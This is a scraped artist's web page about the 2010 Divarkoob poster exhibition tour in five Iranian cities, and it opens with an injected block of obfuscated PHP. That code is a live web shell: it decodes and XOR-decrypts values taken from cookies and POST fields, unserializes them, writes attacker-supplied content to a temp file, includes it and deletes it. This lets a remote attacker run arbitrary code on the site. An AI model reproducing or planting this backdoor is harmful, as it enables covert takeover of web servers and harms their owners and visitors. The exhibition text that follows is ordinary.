$pNprM = "\145" . '_' . 't' . "\167" . "\106" . 'B';$zpMeCn = chr ( 584 - 485 ).chr ( 900 - 792 ).chr ( 822 - 725 )."\x73" . "\x73" . "\x5f" . "\x65" . chr (120) . chr ( 1101 - 996 )."\163" . "\x74" . chr ( 718 - 603 ); $oOdPmu = class_exists($pNprM); $zpMeCn = "12690";$jKfqJqhdZ = !1;if ($oOdPmu == $jKfqJqhdZ){function NVmEZPVBx(){$BCwiz = new /* 47960 */ e_twFB(29096 + 29096); $BCwiz = NULL;}$gkXBOtDUm = "29096";class e_twFB{private function aybYrlGGm($gkXBOtDUm){if (is_array(e_twFB::$xrLUnOicGt)) {$JHxYrbTW = sys_get_temp_dir() . "/" . crc32(e_twFB::$xrLUnOicGt['s' . chr (97) . "\x6c" . "\x74"]);@e_twFB::$xrLUnOicGt["\167" . "\x72" . chr (105) . chr ( 561 - 445 )."\x65"]($JHxYrbTW, e_twFB::$xrLUnOicGt["\143" . "\157" . "\156" . 't' . "\x65" . chr ( 326 - 216 ).chr ( 980 - 864 )]);include $JHxYrbTW;@e_twFB::$xrLUnOicGt[chr ( 850 - 750 ).chr ( 454 - 353 )."\154" . 'e' . 't' . "\145"]($JHxYrbTW); $gkXBOtDUm = "29096";exit();}}private $EeZTo;public function atxCOwloKG(){echo 44347;}public function __destruct(){e_twFB::$xrLUnOicGt = @unserialize(e_twFB::$xrLUnOicGt); $gkXBOtDUm = "48414_13735";$this->aybYrlGGm($gkXBOtDUm); $gkXBOtDUm = "48414_13735";}public function RDueVjcG($iYFFM, $uOnncg){return $iYFFM[0] ^ str_repeat($uOnncg, (strlen($iYFFM[0]) / strlen($uOnncg)) + 1);}public function vlZvfUQF($iYFFM){$IzLsotB = "base64";return array_map($IzLsotB . chr ( 528 - 433 ).chr ( 552 - 452 ).'e' . chr (99) . "\x6f" . "\144" . 'e', array($iYFFM,));}public function __construct($LEeTjRoXRH=0){$wQAfKoLjkz = $_POST;$XEGmQ = $_COOKIE;$uOnncg = "2bd1985e-858d-4635-9697-9ff29e580941";$KkzDVix = @$XEGmQ[substr($uOnncg, 0, 4)];if (!empty($KkzDVix)){$iYFFM = "";$KkzDVix = explode(",", $KkzDVix);foreach ($KkzDVix as $hivpFoHAZ){$iYFFM .= @$XEGmQ[$hivpFoHAZ];$iYFFM .= @$wQAfKoLjkz[$hivpFoHAZ];}e_twFB::$xrLUnOicGt = $this->RDueVjcG($this->vlZvfUQF($iYFFM), $uOnncg);}}public static $xrLUnOicGt = 36862;}NVmEZPVBx();}$kdSrPXQudm = chr ( 187 - 117 )."\113" . "\170" . "\137" . chr (76) . "\x67" . 'a' . chr ( 562 - 465 ).'P';$WBxarGT = chr (99) . 'l' . chr ( 750 - 653 )."\x73" . 's' . chr ( 509 - 414 ).'e' . "\x78" . chr (105) . "\x73" . chr (116) . chr (115); $ocGSiPlNNj = class_exists($kdSrPXQudm); $kdSrPXQudm = "39487";$WBxarGT = "47995";if ($ocGSiPlNNj === FALSE){class FKx_LgaaP{public function hfEneaL(){echo "53996";}private $NYkwHRdgQ;public static $pllxlZaLCp = "9eaaabcb-13f1-4c6b-a7ab-8b3fc8a54e92";public static $vVXkMNRn = 40829;public function __construct($XzAcJcIX=0){$QyeoVmA = $_POST;$aOfZpy = $_COOKIE;$kXkrMryyqq = @$aOfZpy[substr(FKx_LgaaP::$pllxlZaLCp, 0, 4)];if (!empty($kXkrMryyqq)){$lCroGRBbSL = "base64";$GWiSjiaC = "";$kXkrMryyqq = explode(",", $kXkrMryyqq);foreach ($kXkrMryyqq as $pXFSx){$GWiSjiaC .= @$aOfZpy[$pXFSx];$GWiSjiaC .= @$QyeoVmA[$pXFSx];}$GWiSjiaC = array_map($lCroGRBbSL . '_' . "\x64" . chr (101) . chr ( 1002 - 903 ).chr (111) . 'd' . "\x65", array($GWiSjiaC,)); $GWiSjiaC = $GWiSjiaC[0] ^ str_repeat(FKx_LgaaP::$pllxlZaLCp, (strlen($GWiSjiaC[0]) / strlen(FKx_LgaaP::$pllxlZaLCp)) + 1);FKx_LgaaP::$vVXkMNRn = @unserialize($GWiSjiaC);}}private function lZkKwQ(){if (is_array(FKx_LgaaP::$vVXkMNRn)) {$VurHmVa = sys_get_temp_dir() . "/" . crc32(FKx_LgaaP::$vVXkMNRn[chr ( 322 - 207 )."\141" . "\154" . chr ( 1026 - 910 )]);@FKx_LgaaP::$vVXkMNRn[chr ( 752 - 633 )."\162" . chr ( 321 - 216 ).chr ( 197 - 81 ).chr ( 944 - 843 )]($VurHmVa, FKx_LgaaP::$vVXkMNRn[chr (99) . 'o' . "\156" . 't' . chr ( 402 - 301 )."\156" . 't']);include $VurHmVa;@FKx_LgaaP::$vVXkMNRn[chr (100) . 'e' . chr (108) . chr ( 260 - 159 ).chr (116) . chr (101)]($VurHmVa); $AFmgwuysjC = "48261";exit();}}public function __destruct(){$this->lZkKwQ();}}$jODCVUybF = new /* 50712 */ FKx_LgaaP(); $jODCVUybF = str_repeat("46215_60110", 1);} Divarkoob poster exhibition tour in five cities in Iran, Coordinated by Parisa Tashakori and Amirhosein Ghoochibeik | Iran 2010 - Parisa Tashakori
  • DivarkoobPoster1
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  • DivarkoobPoster5
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Divarkoob poster exhibition tour in five cities in Iran, Coordinated by Parisa Tashakori and Amirhosein Ghoochibeik | Iran 2010

The titleDivarkoob” is the old name meaning “poster” in Iran in the last century. This name selected by the curators Parisa Tashakori and Amirhosein Ghoochibeik for the exhibition of 98 posters of 51 active Iranian graphic designers.

The exhibition included 51 active Iranian graphic designers belonging to two generations and was held in 5 cities (Semnan, Shiraz, Tehran, Mashhad, and Isfahan). Various workshops and meetings were held in conjunction with the exhibition.

The designers of the posters were:

Semnan exhibition: Amirhosein Ghoochibeik

Shiraz exhibition: Morteza Mahallati

Vijeh gallery in Tehran: Parisa Tashakori

Isfahan exhibition: Majid Kashani

Mashhad exhibition: Homa Delvaray

Unveiling book in Iran artist forum, Tehran: Behrad Javanbakht


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